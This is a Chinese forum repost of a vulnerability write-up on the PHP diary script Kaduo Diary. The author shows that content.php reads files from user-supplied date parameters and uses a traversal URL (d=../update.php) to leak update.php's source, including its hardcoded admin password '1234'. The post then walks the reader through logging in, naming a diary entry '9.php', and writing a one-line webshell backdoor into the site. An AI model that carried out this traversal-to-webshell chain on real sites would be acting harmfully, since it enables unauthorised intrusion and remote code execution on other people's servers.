[转载]卡哆日记存在严重问题

文章作者：saiy火狐某鱼[ F S T ]

受影响版本：
卡哆日记 所有版本（我就晓得一个版本，在中国站长站下载率好高哦）
作者站点 ：_blank>http://www.kaduo.com （在她站点上没找到这款日记本，虽然很好看，但是老了点，我是看代码无意翻找出来的，fox老大叫我增加阅读，偶就在站长站找代码读啊读啊读啊读，果然，阅读发现漏洞，早我为什么不去读啊。PS。。。。
************************************************************
其实日记在阅读的时候是用了框架并且限制住了鼠标右键，实际日记调用的页是content.php。在那个页的代码是这样的！

<?php
$fp=fopen($diaryfile,r);
while(!feof($fp)){
   $text=fgets($fp,1024);
   $text=eregi_replace("<br>","",$text);
   echo eregi_replace("\n","<br>",$text);
}
fclose($fp);
?>

单纯的读$diaryfile这个文件！！
$diaryfile=$y."-".$m."/".$d;

$diaryfile=说白了就是年-月/日。懂吗？就是假设今天写了日记就是。
$diaryfile=2005-1/8
8为2005-1下一个无后缀的文件，呼~这样都行？她强，谁叫她是女孩子呢？思想单纯了一点，提交网址：_blank>http://www.test.com/rj/content.p ... amp;d=../update.php
呼，我们看到了什么？
此主题相关图片

<?php<br>/*......................................................*/<br>/*                                    */<br>/*　　　　　　　　  本程序由姑嗒哆友情提供　  　　 　　*/<br>/*　　　　　　  　卡哆日记2002(共享版)v1.14　  　　　　*/<br>/*　　    _blank>http://www.kaduo.com gudaduo@kaduo.com 　  　*/<br>/*                                    */<br>/*......................................................*/<br>header("content-Type: text/html; charset=gb2312");<br>$upw="1234";<br>//请勿修改以下部分<br>if(file_exists("install.php")) unlink("install.php");<br>if($para=="menu"){<br>   menu();<br>   header("location:$jump");<br>  

看到了吗？密码是1234！！
那现在我们来干些什么呢？
登陆_blank>http://www.test.com/rj/update.php
输入密码，在日期那里最后一个日那里写成.php，今天是9号了啊？吓，就是9.php~~写后门程序吧~~~建议写一句话后门，因为会被转义的！！
写完访问地址为_blank>http://www.test.com/rj/2005-1/9.php
此主题相关图片

此漏洞也没什么好说的，无非是既然读代码了，读出问题了，就写一下吧！